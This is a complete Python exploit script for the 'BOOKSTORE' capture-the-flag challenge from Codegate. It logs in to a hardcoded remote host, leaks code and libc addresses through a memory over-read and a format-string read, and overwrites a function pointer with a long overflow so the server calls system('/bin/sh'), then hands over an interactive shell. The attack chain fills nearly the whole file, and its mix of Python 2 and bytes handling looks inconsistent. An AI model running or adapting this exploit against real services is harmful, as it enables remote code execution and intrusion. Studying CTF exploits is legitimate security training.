Codegate CTF BOOKSTORE exploit
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
# The first CLI argument selects the build: "l" means the local test instance,
# anything else the remote challenge box.  Both the distance between printf()
# and system() inside the target's libc and the host/port depend on that choice.
_local = len(sys.argv) > 1 and sys.argv[1] == "l"
print("=== local exploit" if _local else "=== remote exploit")
system_offset = 0xd0f0 if _local else 0xcf70
TARGET = ('localhost', 31337) if _local else ('54.65.210.251', 31337)
def e(s):
    """Encode the text `s` as UTF-8 bytes."""
    encoding = 'UTF-8'
    return s.encode(encoding)
def d(s):
    """Decode the UTF-8 bytes `s` back into text."""
    text = s.decode('UTF-8')
    return text
def p(d, fmt='<I'):
    """Pack the integer `d` with struct format `fmt` (default: 32-bit little-endian unsigned)."""
    packed = struct.pack(fmt, d)
    return packed
def u(d, fmt='<I'):
    """Unpack the bytes `d` with struct format `fmt`; returns the tuple struct.unpack yields."""
    fields = struct.unpack(fmt, d)
    return fields
def u1(d, fmt='<I'):
    """Unpack a single value from `d` using `fmt` and return it (not wrapped in a tuple)."""
    (value,) = struct.unpack(fmt, d)
    return value
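def readtil(delim):
    """Read from the global socket `s` one byte at a time until `delim` has arrived.

    Args:
        delim: text delimiter; it is UTF-8 encoded with e() before matching.

    Returns:
        The raw bytes received, including the delimiter.

    Raises:
        EOFError: the peer closed the connection before the delimiter arrived.
            (The original looped forever here, because recv() returning b''
            never made the `in` test true.)
    """
    target = e(delim)
    buf = b''
    # Bytes arrive one at a time, so the first occurrence of the delimiter is
    # always at the end of the buffer; endswith() is therefore equivalent to
    # `target in buf` but does not rescan the whole buffer on every byte.
    while not buf.endswith(target):
        chunk = s.recv(1)
        if not chunk:
            raise EOFError('connection closed while waiting for %r' % (delim,))
        buf += chunk
    return buf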
def read(num):
    """Receive up to `num` bytes from the global socket `s` with a single recv() call."""
    data = s.recv(num)
    return data
def sendln(b):
    """Send `b` as one line over the global socket `s`: str(b) followed by a newline."""
    line = str(b) + b'\n'
    s.sendall(line)
def send(b):
    """Write `b` to the global socket `s` unchanged; unlike sendln(), no newline is appended."""
    payload = b
    s.sendall(payload)
###########################################################################
def start_modify(book_id):
    """Choose menu option 2 and then the book `book_id`, waiting for the server's reply after each line."""
    exchange = (("2", " : "), (str(book_id), "u!\n"))
    for answer, expect in exchange:
        sendln(answer)
        readtil(expect)
def modify_info(stock, price, shipping, available, name, description):
    """Fill in every field of the 'modify information' dialog (option 3 of the current menu).

    Each value is sent as its own line; after each one readtil() consumes the
    server output up to the given fragment, which is presumably the tail of the
    next prompt.  Nothing is returned.
    """
    print("\t- Modify Information")
    dialog = (
        ("3", " : \n"),
        (stock, " : \n"),
        (price, ") \n"),
        (shipping, " :\n"),
        (available, "name\n"),
        (name, "ion\n"),
        (description, "u!\n"),
    )
    for value, expect in dialog:
        sendln(value)
        readtil(expect)
def display_info(book_id):
    """Choose option 3, answer with `book_id`, and return the server's reply up to the next '> ' prompt as bytes."""
    print("\t- Display Info")
    sendln("3")
    readtil(" : ")
    sendln(book_id)
    reply = readtil("> ")
    return reply
def create_book(name, description):
    """Create a book via option 1 with `name` and `description`, then answer '0' and wait for the '> ' prompt."""
    print("\t- Create Book")
    dialog = (
        ("1", ": \n"),
        (name, ": \n"),
        (description, ")\n"),
        ("0", "> "),
    )
    for value, expect in dialog:
        sendln(value)
        readtil(expect)
def modify_shipping(shipping):
    """Change only the shipping field through option 4 of the current menu."""
    print("\t- Modify Shipping")
    for value, expect in (("4", ")\n"), (shipping, "u!\n")):
        sendln(value)
        readtil(expect)
def modify_description(desc):
    """Change only the description through option 2 of the current menu.

    A NUL byte is appended to `desc` before the line terminator that sendln()
    adds, so the server sees an explicitly terminated string.
    """
    print("\t- Modify Description")
    terminated = desc + "\x00"
    for value, expect in (("2", "ion\n"), (terminated, "u!\n")):
        sendln(value)
        readtil(expect)
def main_menu():
    """Send '0' and wait for the '> ' prompt; used in pwn() to leave a submenu."""
    choice = "0"
    sendln(choice)
    readtil("> ")
def pwn():
    """Run the whole exploit against TARGET over a fresh TCP socket stored in the global `s`.

    Stages, in order: log in; leak a code address from a book's info dump;
    read printf's libc address through the format-string read in the book
    name; derive system() from it with `system_offset`; trigger the call to
    system() with "/bin/sh" as the book name; finally hand the socket to
    telnetlib for an interactive session.  Network I/O only, returns nothing.
    """
    global s
    s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    # TCP_NODELAY: each short send()/sendln() goes out immediately instead of
    # being coalesced, which keeps the prompt/answer lock-step predictable.
    s.setsockopt( socket.IPPROTO_TCP, socket.TCP_NODELAY, 1 )
    s.connect(TARGET)
    # Login
    print "[x] Login"
    readtil(" : ")
    send("helloadmin")
    readtil(" : ")
    send("iulover!@#$")
    readtil("> ")
    create_book("book1", "description of book1")
    # first leak printf@plt and printf@got address
    start_modify(0)
    # The over-long name/description values are what make the later info dump
    # spill adjacent memory; the exact field layout is not visible here.
    modify_info(99999999, 99999999, 1, 1, "AAAAAAAAAAAAAAAAAAAAAAA", "AAAAAAAAAAAA")
    main_menu()
    name = display_info("0").split("name : '")[1]
    # Bytes 28..31 after "name : '" are read as a little-endian pointer;
    # 0x32d and 0x3990 are fixed deltas for this binary (printf@plt, then its GOT slot).
    print_shipping = u1(name[28:32])
    printf_plt = print_shipping - 0x32d
    printf_got = printf_plt + 0x3990
    print "[x] printf@plt " + hex(printf_plt)
    print "[x] printf@got " + hex(printf_got)
    # read printf@libc address from printf@got
    create_book("book2", "desc2")
    start_modify(1)
    # NOTE(review): 2672 filler bytes followed by an address in the description
    # presumably overwrite a function pointer the server later calls with the
    # book name as argument (first printf@plt, later system) -- inferred from
    # the payload layout, not visible in this file.
    payload_printf_libc = "A" * 2672 + p(printf_plt) + "\n"
    modify_description(payload_printf_libc)
    # The name is used as a printf format string by the server: "%11$s"
    # dereferences the 11th argument slot, which holds printf_got placed
    # right after the "aaaa" marker, so the dump contains printf's libc address.
    modify_info(9999999, 999999999, 0, 1, "aaaa" + p(printf_got) +"%11$s", "A")
    modify_shipping(1)
    main_menu()
    # fetch printf@libc and calculate system@libc with offset
    # Take the 4 bytes after the marker; [4:8] skips the packed printf_got echoed back first.
    printf_libc = u1(display_info(1).split("aaaa")[1][4:8])
    system_libc = printf_libc - system_offset
    print "[x] printf@libc " + hex(printf_libc)
    print "[x] system@libc " + hex(system_libc)
    # final exploit, simply call system() and provide /bin/sh as name
    start_modify(1)
    payload_exploit = "A" * 2672 + p(system_libc) + "\n"
    modify_description(payload_exploit)
    modify_info(99999999, 99999999, 0, 1, "/bin/sh\x00", "xyz")
    modify_shipping(1)
    main_menu()
    print "[x] your shell:"
    # Same "display book 1" sequence as display_info(), but only consumed up to
    # "xyz" (the description set above) so the remaining output belongs to the shell.
    sendln(3)
    readtil(" : ")
    sendln(1)
    readtil("xyz")
    # interact with shell
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()
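if __name__ == "__main__":
    # Only run when executed as a script, so importing this file (for example
    # to reuse the packing/socket helpers) does not open a connection to TARGET.
    pwn()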